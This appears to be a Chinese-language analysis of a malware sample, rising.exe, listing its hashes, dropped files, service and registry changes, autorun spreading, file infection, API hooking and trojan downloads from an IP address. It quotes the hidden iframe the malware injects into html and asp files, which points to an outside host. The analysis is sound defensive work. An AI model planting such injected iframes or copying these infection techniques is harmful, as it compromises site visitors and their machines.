File: rising.exe Size: 64775 bytes File Version: 1.00 MD5: 86311B37D938BB35645E7B092014DD63 SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3 CRC32: 88ABBD9B
rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他 之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹 注册服务139CA82A.EXE 139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程
释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动 感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园 感染 html asp 等文件 在其后面插入代码 <iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系统时间 随机把年份往前调 月,日不变 修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue: 值为 0x00000000 导致无法显示临时文件
rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏
使用Explorer.exe连接网络 61.152.92.98:80下载木马 下载的木马一般为K117815XXXXX.exe XXXXX代表随机 到系统文件夹
由于 每台机器上下载的木马的名称不同 但最后结果相同 所以中间释放的过程省略 最后 这些木马运行后分别释放了如下文件 C:\WINDOWS\system32\buchehuo.exe(创建了服务inetsvr)
C:\WINDOWS\system32\cmdbs.dll C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll C:\WINDOWS\msccrt.exe C:\WINDOWS\system32\winform.dll C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
临时文件夹下 释放upxdnd.exe和upxdnd.dll |